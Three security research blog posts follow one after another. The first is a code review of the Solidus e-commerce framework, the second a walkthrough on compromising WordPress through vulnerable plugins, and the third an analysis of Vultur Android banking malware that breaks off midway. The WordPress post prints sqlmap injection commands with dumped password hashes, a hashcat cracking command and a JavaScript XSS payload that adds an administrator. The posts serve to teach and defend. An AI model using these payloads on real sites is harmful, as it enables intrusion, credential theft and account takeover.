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Solidus — Code Review

Solidus — Code Review

As a Research Engineer at Tenable, we have several periods during the year to work on a subject of our choice, as long as it represents an interest for the team. For my part, I’ve chosen to carry out a code review on a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus which is an open-source eCommerce framework for industry trailblazers. Originally the project was a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.

Project selection

Solidus wasn’t my first choice, I originally wanted to select Zammad, which is a web-based open source helpdesk/customer support system also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because for many businesses, the support/ticketing component is quite critical, identifying a vulnerability in a project such as Zammad almost guarantees having an interesting vulnerability !

For various reasons, whether it’s on my professional or personal laptop, I need to run the project in a Docker, something that’s pretty common today for a web project but :

Zammad is a project that requires many bricks such as Elasticsearch, Memcached, PostgresQL & Redis and although the project provided a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of Github, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the Solidus Dockerfile supplied, but by browsing the issues and making some modifications on my own I was able to quickly launch the project.

Project started with bin/dev cmd

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture, although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this Framework is “Convention over Configuration”, which means that many choices are made for you, and means that all environments used will have similarities, which makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file !

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files :

  • Admin Namespace SolidusAdmin::Engine
  • Backend Namespace Spree::Core::Engine
  • API Namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means “The GET request on /orders/mine” will be sent to the “mine” method of the “Orders” controller (we don’t care about the “as: ‘my_orders” here).

module Spree
module Api
class OrdersController < Spree::Api::BaseController
def mine
if current_api_user
@orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
@orders = paginate(@orders)
render "spree/api/errors/unauthorized", status: :unauthorized

Or via the CRUD system using something like :

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation :

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs :

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • ̶D̶E̶L̶E̶T̶E̶ ̶/̶c̶u̶s̶t̶o̶m̶e̶r̶_̶r̶e̶t̶u̶r̶n̶s̶/̶:̶i̶d̶ is ignored because of “except: :destroy”

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Not to mention all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a Github Action, the results are then directly visible in the Security tab.

Extract of vulnerabilities identified by CodeQL

Processing the results from all the tools takes a lot of time, many of them are redundant and I have also observed that some paid tools are in fact just overlays of open source tools such as Semgrep (the results being exactly the same / the same phrases).

Special mention to Brakeman, which is a tool dedicated to the analysis of Ruby on Rails code, the tool allows you to quickly and simply have some interesting path to explore in a readable manner.

Extract of vulnerabilities identified by Brakeman

Without going over all the discoveries that I have put aside (paths to explore). Some vulnerabilities are quick to rule out. Take for example the discovery “Polynomial regular expression used on uncontrolled data” from CodeQL :

In addition to seeming not exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to a user input but to the call of a method which returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not and for that there are several methods.

On the main shop page, it is possible to search for the following patterns :

<p>Powered by <a href="">Solidus</a></p>

Or check if the following JS functions are available :


Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns :

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others and these do not make it possible to determine the version of Solidus.

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user and given the number of routes available, I thought I’d spend a little time there, but I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process. :

Once the order is placed, user actions are rather limited

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited, apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.) there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP, this configuration must be done directly in the Rails project config

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e. the latest version available so I didn’t spend too much time on this part which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined

  • SuperUser : Namely the administrator, which therefore allows access to all the functionalities
  • DefaultCustomer : The default role assigned during registration, the basic role simply allowing you to make purchases on the site

To manage this brick, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered as a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => “_blank”` which therefore makes an XSS difficult to exploit (or via crazy combinations such as click wheel) I found it interesting to dig into this part of the code and understand how to achieve this injection simply because this concerns the administration part.

Here’s how this vulnerability could be exploited :

1/ An administrator must modify the shipping methods to add the `javascript:alert(document.domain)` as tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload which can be triggered via a click wheel

By default, the only role being possible being an administrator the only possibility is that an administrator traps another administrator… in other words, far from being interesting

Note : According to Solidus documentation, in a configuration that is not the basic one, it would be possible for a user with less privileges to exploit this vulnerability

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response.
The vulnerability was published under

2/ Solidus, State Machine & Race Conditions

In an ecommerce site, I find that testing race conditions is a good thing because certain features are conducive to this test, such as discount tickets.

But before talking about race condition, we must understand the concept of State machine

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

If I talk about that, it’s because the Solidus documentation has a chapter dedicated to that and I think it’s quite rare to highlight it !

Now we can try to see if any race conditions are hidden in the use of a promotion code.

This section of the code being still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in the case of a whitebox audit, it is sometimes easier to trace the code from an error in the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

Then simply look for the error in the entire project code and then trace its use backwards to the method which checks the use of the coupon

It’s quite difficult to go into detail and explain all the checks but we can summarize by simply explaining that a coupon is associated with a specific order and as soon as we try to apply a new coupon, the code checks if it is already associated with the order or not.

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but we understand from reading these lines that the main building blocks of Solidus are rather robust and that on a default installation, I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. On solidus, we can arrange the extensions according to 3 types

  • Official integrations : Listed on the main website, we mainly find extensions concerning payments
  • Community Extensions : Listed on a dedicated Github repository, we find various and varied extensions that are more or less maintained
  • Others Extensions : Extensions found elsewhere, but there’s no guarantee that they’ll work or that they’ll be supported

Almost all official extensions require integration with a 3rd party and will therefore make requests on a third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions to test a few extensions for which I would have liked to have native functionality on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for 2 years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed …

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins such as Solidus Friendly Promotions, according to its documentation, replace Solidus cores features and are therefore inherently more likely to introduce a vulnerability.


Presenting all the tests that can and have been carried out is also far too time-consuming. Code analysis really is time-consuming, so to claim that I’ve been exhaustive and analyzed the whole application would be false but, after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to have been able to detail a few vulnerabilities, but this blog post tends to show that you can’t always be fruitful.

Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

WordPress : From vulnerability identification to compromising

WordPress : From vulnerability identification to compromising

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

Although, as demonstrated by the recent CVE-2024–4439 vulnerability, WordPress is not flawless, it remains an extremely robust solution, and from an attacker’s point of view, it’s much easier to find another entry point to compromise a WordPress instance.

Luckily (or not) this other vector exists and it’s WordPress plugins. With nearly 60,000 free extensions available, any one of them can represent a possible gateway to a complete compromise of your instance.

Based on our day-to-day work at Tenable Research, we will illustrate this in this article through different steps/scenarios on a real WordPress instance.

1/ Identify available WordPress plugins

When a WordPress plugin is created, developers can rely on a number of standards. Among these standards is the “Readme.txt” file, which many plugins respect.

This file can be used by an attacker to identify whether or not a plugin is available. In the knowledge that this file is most of the time available at the URL “http://WORDPRESS/wp-content/plugins/[PLUGIN SLUG]/readme.txt” using a wordlist of plugin names, an attacker can perform bruteforce to identify available plugins.

We can see here that we have two plugins installed

If you take a closer look at the second one, you’ll see that it’s installed in version 2.9.7

Note : Sometimes the stable tag is empty but you can still look at the changelog section

A quick search reveals that this plugin is vulnerable to an unauthenticated SQL injection !

Now that we’ve identified the available plugins and that one of them is vulnerable, we’ll now look at how to compromise the WordPress instance.

2/ From SQL Injection to complete compromission

First, you need to understand the vulnerability in order to understand how to exploit it. Either by

  • Downloading a vulnerable version, looking at the code and trying to reproduce the vulnerability
  • Or a public exploit is already available

In our case, the vulnerability is detailed in this article and the command to exploit it via the SQLmap tool is provided.

With SQL Injection, among the available techniques, the most common consists of extracting the users and their password hash.

sqlmap -u "" -p code --dbms=MySQL -dump -T wp_users -C user_login,user_pass
[14:59:53] [INFO] GET parameter 'code' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
GET parameter 'code' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
Parameter: code (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: rest_route=/pmpro/v1/order&code=a' AND (SELECT 1804 FROM (SELECT(SLEEP(5)))jJJd) AND 'MnNj'='MnNj
Database: wasvwa
Table: wp_users
[2 entries]
| user_login | user_pass |
| subscriber | $P$BQG8CvNGjGGbMmr5KxN8p3BnwdgMbf0 |
| admin | $P$BUwEadKq2ID1rSD6/G4/tTf85WONEf1 |

Note : Users are usually stored in the ‘wp_users’ table, with ‘wp_’ being the basic prefix. If this is not the case, you can search for the table name/prefix by listing the columns with the following SQLmap command :

sqlmap -u "" -p code --dbms=MySQL —-columns
[15:50:38] [INFO] retrieved: wp_pmpro_membership_ordermeta

Now that we have recovered the users and the hashes we need to find the password in clear text. We will not go into the details of this step here and simply use hashcat with a wordlist to recover the password in plain text.

The only important option to understand here is `-m 400` which translates as “hash mode 400”. The number 400 corresponds to the password hashing technique used by WordPress. In the background, WordPress uses the ‘wp_hash_password()’ function which uses the PHPass library and, in short, returns an MD5 hashed password with additional security mechanisms.

hashcat -m 400 -a 0 -o cracked.txt hash.txt wordlist.txt
cat cracked.txt
> $P$BUwEadKq2ID1rSD6/G4/tTf85WONEf1:password

To summarize, we identified the available plugins, one of them is in a version vulnerable to an unauthenticated SQL injection which we exploited to retrieve the list of available users with their hashes which we bruteforce to recover the clear password of the administrator !

The next step is therefore to authenticate, to do this, by default, the URL of the WordPress admin panel is available at the URL /wp-admin/

Except that in our case, we are redirected to a 404! If we return to the list of installed plugins, we remember that “WPS Hide Login” is installed.

WPS Hide Login is a very light plugin that lets you easily and safely change the url of the login form page to anything you want.

Once again, we will be able to use our SQL injection to find the real login URL. For this plugin, what we are looking for is stored in column ‘option_value’ of the table ‘wp_options’

sqlmap -u "" -p code --dbms=MySQL -dump -T wp_options -C option_value --where "option_name='whl_page'"
Table: wp_options
[1 entry]
| option_value |
| hidden_login |

We can now access the login page and authenticate.

Once authenticated, to obtain an RCE, among the available techniques the two simplest are as follows :

  • Upload a new malicious plugin to execute code
  • Edit an existing file to insert malicious code

The second is the simplest because everything is already there by default, you just have to go to “Tools > Theme File Editor > Themes Functions” and insert a piece of PHP code allowing you to execute code.

Once saved, we can therefore execute arbitrary code on our WordPress instance

3/ From Cross-Site Scripting to complete compromission

Less direct than an SQLi, an XSS can also compromise a WordPress instance, and for this example we’ll take the WP RSS Aggregator version 4.23.8.

This plugin is vulnerable to a reflected XSS and therefore requires that the URL containing the payload be transmitted directly to the administrator.

The original request can be obtained by going to the plugin page and clicking on the “Dismiss this notification” button :

On the code side, in version below 4.23.9 of WP RSS Aggregator, this vulnerability is present due to the use of the `sprintf()` function, which is used to display the response to the user.

The notice_id value is inserted into the message without filtering allowing to insert arbitrary HTML code :

There are several XSS techniques that can be used to take control of an instance, the two most common being :

  • Add a new administrator
  • Modify page code directly to insert a webshell

The code below, for example, is used to create a new administrator :

requestURL = "/wp-admin/user-new.php";
nonceRegex = /ser" value="([^"]*?)"/g;

xhr = new XMLHttpRequest();"GET", requestURL, false);

nonceMatch = nonceRegex.exec(xhr.responseText);
nonce = nonceMatch[1];
params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&[email protected]&pass1=password&pass2=password&role=administrator";

xhr = new XMLHttpRequest();"POST", requestURL, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

Simply save the code to a file on a publicly accessible server, send the URL containing our payload (loading our remote script) and you’re done.

A new administrator is added :

As a side note, the plugin author has corrected the vulnerability by escaping the HTML code of Exceptions messages :

Which corrects the vulnerability :

This article shows how to identify available plugins, compromise an instance via SQL Injection while bypassing a defense mechanism that hides the login URL, and also how to create a new administrator via Cross-Site Scripting.

Obviously, this article is only an introduction and does not describe all possible cases or less likely/common scenarios, such as the possibility of creating an administrator via SQL Injection.

However, we understand that although WordPress is reputed to be robust, plugins are not necessarily so and can therefore allow your instance to be compromised. It is therefore essential to review the plugins you install, check that they are up to date and if possible enable automatic updates.

WordPress : From vulnerability identification to compromising was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Android Malware Vultur Expands Its Wingspan

28 March 2024 at 10:00

Authored by Joshua Kamp

Executive summary

The authors behind Android banking malware Vultur have been spotted adding new technical features, which allow the malware operator to further remotely interact with the victim’s mobile device. Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions.

Key takeaways

  • The authors behind Vultur, an Android banker that was first discovered in March 2021, have been spotted adding new technical features.
  • New technical features include the ability to:
    • Download, upload, delete, install, and find files;
    • Control the infected device using Android Accessibility Services (sending commands to perform scrolls, swipe gestures, clicks, mute/unmute audio, and more);
    • Prevent apps from running;
    • Display a custom notification in the status bar;
    • Disable Keyguard in order to bypass lock screen security measures.
  • While the new features are mostly related to remotely interact with the victim’s device in a more flexible way, Vultur still contains the remote access functionality using AlphaVNC and ngrok that it had back in 2021.
  • Vultur has improved upon its anti-analysis and detection evasion techniques by:
    • Modifying legitimate apps (use of McAfee Security and Android Accessibility Suite package name);
    • Using native code in order to decrypt payloads;
    • Spreading malicious code over multiple payloads;
    • Using AES encryption and Base64 encoding for its C2 communication.


Vultur is one of the first Android banking malware families to include screen recording capabilities. It contains features such as keylogging and interacting with the victim’s device screen. Vultur mainly targets banking apps for keylogging and remote control. Vultur was first discovered by ThreatFabric in late March 2021. Back then, Vultur (ab)used the legitimate software products AlphaVNC and ngrok for remote access to the VNC server running on the victim’s device. Vultur was distributed through a dropper-framework called Brunhilda, responsible for hosting malicious applications on the Google Play Store [1]. The initial blog on Vultur uncovered that there is a notable connection between these two malware families, as they are both developed by the same threat actors [2].

In a recent campaign, the Brunhilda dropper is spread in a hybrid attack using both SMS and a phone call. The first SMS message guides the victim to a phone call. When the victim calls the number, the fraudster provides the victim with a second SMS that includes the link to the dropper: a modified version of the McAfee Security app.

The dropper deploys an updated version of Vultur banking malware through 3 payloads, where the final 2 Vultur payloads effectively work together by invoking each other’s functionality. The payloads are installed when the infected device has successfully registered with the Brunhilda Command-and-Control (C2) server. In the latest version of Vultur, the threat actors have added a total of 7 new C2 methods and 41 new Firebase Cloud Messaging (FCM) commands. Most of the added commands are related to remote access functionality using Android’s Accessibility Services, allowing the malware operator to remotely interact with the victim’s screen in a way that is more flexible compared to the use of AlphaVNC and ngrok.

In this blog we provide a comprehensive analysis of Vultur, beginning with an overview of its infection chain. We then delve into its new features, uncover its obfuscation techniques and evasion methods, and examine its execution flow. Following that, we dissect its C2 communication, discuss detection based on YARA, and draw conclusions. Let’s soar alongside Vultur’s smarter mobile malware strategies!

Infection chain

In order to deceive unsuspecting individuals into installing malware, the threat actors employ a hybrid attack using two SMS messages and a phone call. First, the victim receives an SMS message that instructs them to call a number if they did not authorise a transaction involving a large amount of money. In reality, this transaction never occurred, but it creates a false sense of urgency to trick the victim into acting quickly. A second SMS is sent during the phone call, where the victim is instructed into installing a trojanised version of the McAfee Security app from a link. This application is actually Brunhilda dropper, which looks benign to the victim as it contains functionality that the original McAfee Security app would have. As illustrated below, this dropper decrypts and executes a total of 3 Vultur-related payloads, giving the threat actors total control over the victim’s mobile device.

Figure 1: Visualisation of the complete infection chain. Note: communication with the C2 server occurs during every malware stage.

New features in Vultur

The latest updates to Vultur bring some interesting changes worth discussing. The most intriguing addition is the malware’s ability to remotely interact with the infected device through the use of Android’s Accessibility Services. The malware operator can now send commands in order to perform clicks, scrolls, swipe gestures, and more. Firebase Cloud Messaging (FCM), a messaging service provided by Google, is used for sending messages from the C2 server to the infected device. The message sent by the malware operator through FCM can contain a command, which, upon receipt, triggers the execution of corresponding functionality within the malware. This eliminates the need for an ongoing connection with the device, as can be seen from the code snippet below.

Figure 2: Decompiled code snippet showing Vultur’s ability to perform clicks and scrolls using Accessibility Services. Note for this (and upcoming) screenshot(s): some variables, classes and method names were renamed by the analyst. Pink strings indicate that they were decrypted.

While Vultur can still maintain an ongoing remote connection with the device through the use of AlphaVNC and ngrok, the new Accessibility Services related FCM commands provide the actor with more flexibility.

In addition to its more advanced remote control capabilities, Vultur introduced file manager functionality in the latest version. The file manager feature includes the ability to download, upload, delete, install, and find files. This effectively grants the actor(s) with even more control over the infected device.

Figure 3: Decompiled code snippet showing part of the file manager related functionality.

Another interesting new feature is the ability to block the victim from interacting with apps on the device. Regarding this functionality, the malware operator can specify a list of apps to press back on when detected as running on the device. The actor can include custom HTML code as a “template” for blocked apps. The list of apps to block and the corresponding HTML code to be displayed is retrieved through the vnc.blocked.packages C2 method. This is then stored in the app’s SharedPreferences. If available, the HTML code related to the blocked app will be displayed in a WebView after it presses back. If no HTML code is set for the app to block, it shows a default “Temporarily Unavailable” message after pressing back. For this feature, payload #3 interacts with code defined in payload #2.

Figure 4: Decompiled code snippet showing part of Vultur’s implementation for blocking apps.

The use of Android’s Accessibility Services to perform RAT related functionality (such as pressing back, performing clicks and swipe gestures) is something that is not new in Android malware. In fact, it is present in most Android bankers today. The latest features in Vultur show that its actors are catching up with this trend, and are even including functionality that is less common in Android RATs and bankers, such as controlling the device volume.

A full list of Vultur’s updated and new C2 methods / FCM commands can be found in the “C2 Communication” section of this blog.

Obfuscation techniques and detection evasion

Like a crafty bird camouflaging its nest, Vultur now employs a set of new obfuscation and detection evasion techniques when compared to its previous versions. Let’s look into some of the notable updates that set apart the latest variant from older editions of Vultur.

AES encrypted and Base64 encoded HTTPS traffic

In October 2022, ThreatFabric mentioned that Brunhilda started using string obfuscation using AES with a varying key in the malware samples themselves [3]. At this point in time, both Brunhilda and Vultur did not encrypt its HTTP requests. That has changed now, however, with the malware developer’s adoption of AES encryption and Base64 encoding requests in the latest variants.

Figure 5: Example AES encrypted and Base64 encoded request for bot registration.

By encrypting its communications, malware can evade detection of security solutions that rely on inspecting network traffic for known patterns of malicious activity. The decrypted content of the request can be seen below. Note that the list of installed apps is shown as Base64 encoded text, as this list is encoded before encryption.

{"id":"6500","method":"application.register","params":{"package":"com.wsandroid.suite","device":"Android/10","model":"samsung GT-I900","country":"sv-SE","apps":"cHQubm92b2JhbmNvLm5iYXBwO3B0LnNhbnRhbmRlcnRvdHRhLm1vYmlsZXBhcnRpY3VsYXJlcztzYS5hbHJhamhpYmFuay50YWh3ZWVsYXBwO3NhLmNvbS5zZS5hbGthaHJhYmE7c2EuY29tLnN0Y3BheTtzYW1zdW5nLnNldHRpbmdzLnBhc3M7c2Ftc3VuZy5zZXR0aW5ncy5waW47c29mdGF4LnBla2FvLnBvd2VycGF5O3RzYi5tb2JpbGViYW5raW5nO3VrLmNvLmhzYmMuaHNiY3VrbW9iaWxlYmFua2luZzt1ay5jby5tYm5hLmNhcmRzZXJ2aWNlcy5hbmRyb2lkO3VrLmNvLm1ldHJvYmFua29ubGluZS5tb2JpbGUuYW5kcm9pZC5wcm9kdWN0aW9uO3VrLmNvLnNhbnRhbmRlci5zYW50YW5kZXJVSzt1ay5jby50ZXNjb21vYmlsZS5hbmRyb2lkO3VrLmNvLnRzYi5uZXdtb2JpbGViYW5rO3VzLnpvb20udmlkZW9tZWV0aW5nczt3aXQuYW5kcm9pZC5iY3BCYW5raW5nQXBwLm1pbGxlbm5pdW07d2l0LmFuZHJvaWQuYmNwQmFua2luZ0FwcC5taWxsZW5uaXVtUEw7d3d3LmluZ2RpcmVjdC5uYXRpdmVmcmFtZTtzZS5zd2VkYmFuay5tb2JpbA==","tag":"dropper2"}

Utilisation of legitimate package names

The dropper is a modified version of the legitimate McAfee Security app. In order to masquerade malicious actions, it contains functionality that the official McAfee Security app would have. This has proven to be effective for the threat actors, as the dropper currently has a very low detection rate when analysed on VirusTotal.

Figure 6: Brunhilda dropper’s detection rate on VirusTotal.

Next to modding the legitimate McAfee Security app, Vultur uses the official Android Accessibility Suite package name for its Accessibility Service. This will be further discussed in the execution flow section of this blog.

Figure 7: Snippet of Vultur’s AndroidManifest.xml file, where its Accessibility Service is defined with the Android Accessibility Suite package name.

Leveraging native code for payload decryption

Native code is typically written in languages like C or C++, which are lower-level than Java or Kotlin, the most popular languages used for Android application development. This means that the code is closer to the machine language of the processor, thus requiring a deeper understanding of lower-level programming concepts. Brunhilda and Vultur have started using native code for decryption of payloads, likely in order to make the samples harder to reverse engineer.

Distributing malicious code across multiple payloads

In this blog post we show how Brunhilda drops a total of 3 Vultur-related payloads: two APK files and one DEX file. We also showcase how payload #2 and #3 can effectively work together. This fragmentation can complicate the analysis process, as multiple components must be assembled to reveal the malware’s complete functionality.

Execution flow: A three-headed… bird?

While previous versions of Brunhilda delivered Vultur through a single payload, the latest variant now drops Vultur in three layers. The Brunhilda dropper in this campaign is a modified version of the legitimate McAfee Security app, which makes it seem harmless to the victim upon execution as it includes functionality that the official McAfee Security app would have.

Figure 8: The modded version of the McAfee Security app is launched.

In the background, the infected device registers with its C2 server through the /ejr/ endpoint and the application.register method. In the related HTTP POST request, the C2 is provided with the following information:

  • Malware package name (as the dropper is a modified version of the McAfee Security app, it sends the official com.wsandroid.suite package name);
  • Android version;
  • Device model;
  • Language and country code (example: sv-SE);
  • Base64 encoded list of installed applications;
  • Tag (dropper campaign name, example: dropper2).

The server response is decrypted and stored in a SharedPreference key named 9bd25f13-c3f8-4503-ab34-4bbd63004b6e, where the value indicates whether the registration was successful or not. After successfully registering the bot with the dropper C2, the first Vultur payload is eventually decrypted and installed from an onClick() method.

Figure 9: Decryption and installion of the first Vultur payload.

In this sample, the encrypted data is hidden in a file named 78a01b34-2439-41c2-8ab7-d97f3ec158c6 that is stored within the app’s “assets” directory. When decrypted, this will reveal an APK file to be installed.

The decryption algorithm is implemented in native code, and reveals that it uses AES/ECB/PKCS5Padding to decrypt the first embedded file. The Lib.d() function grabs a substring from index 6 to 22 of the second argument (IPIjf4QWNMWkVQN21ucmNiUDZaVw==) to get the decryption key. The key used in this sample is: QWNMWkVQN21ucmNi (key varies across samples). With this information we can decrypt the 78a01b34-2439-41c2-8ab7-d97f3ec158c6 file, which brings us another APK file to examine: the first Vultur payload.

Layer 1: Vultur unveils itself

The first Vultur payload also contains the application.register method. The bot registers itself again with the C2 server as observed in the dropper sample. This time, it sends the package name of the current payload ( in this example), which is not a modded application. The “tag” that was related to the dropper campaign is also removed in this second registration request. The server response contains an encrypted token for further communication with the C2 server and is stored in the SharedPreference key f9078181-3126-4ff5-906e-a38051505098.

Figure 10: Decompiled code snippet that shows the data to be sent to the C2 server during bot registration.

The main purpose of this first payload is to obtain Accessibility Service privileges and install the next Vultur APK file. Apps with Accessibility Service permissions can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities, such as keylogging, automatically granting itself additional permissions, monitoring foreground apps and overlaying them with phishing windows.

In order to gain further control over the infected device, this payload displays custom HTML code that contains instructions to enable Accessibility Service permissions. The HTML code to be displayed in a WebView is retrieved from the installer.config C2 method, where the HTML code is stored in the SharedPreference key bbd1e64e-eba3-463c-95f3-c3bbb35b5907.

Figure 11: HTML code is loaded in a WebView, where the APP_NAME variable is replaced with the text “McAfee Master Protection”.

In addition to the HTML content, an extra warning message is displayed to further convince the victim into enabling Accessibility Service permissions for the app. This message contains the text “Your system not safe, service McAfee Master Protection turned off. For using full device protection turn it on.” When the warning is displayed, it also sets the value of the SharedPreference key 1590d3a3-1d8e-4ee9-afde-fcc174964db4 to true. This value is later checked in the onAccessibilityEvent() method and the onServiceConnected() method of the malicious app’s Accessibility Service.

An important observation here, is that the malicious app is using the package name for its Accessibility Service. This is the package name of the official Android Accessibility Suite, as can be seen from the following link:
The implementation is of course different from the official Android Accessibility Suite and contains malicious code.

When the Accessibility Service privileges have been enabled for the payload, it automatically grants itself additional permissions to install apps from unknown sources, and installs the next payload through the UpdateActivity.

Figure 12: Decryption and installation of the second Vultur payload.

The second encrypted APK is hidden in a file named data that is stored within the app’s “assets” directory. The decryption algorithm is again implemented in native code, and is the same as in the dropper. This time, it uses a different decryption key that is derived from the DXMgKBY29QYnRPR1k1STRBNTZNUw== string. The substring reveals the actual key used in this sample: Y29QYnRPR1k1STRB (key varies across samples). After decrypting, we are presented with the next layer of Vultur.

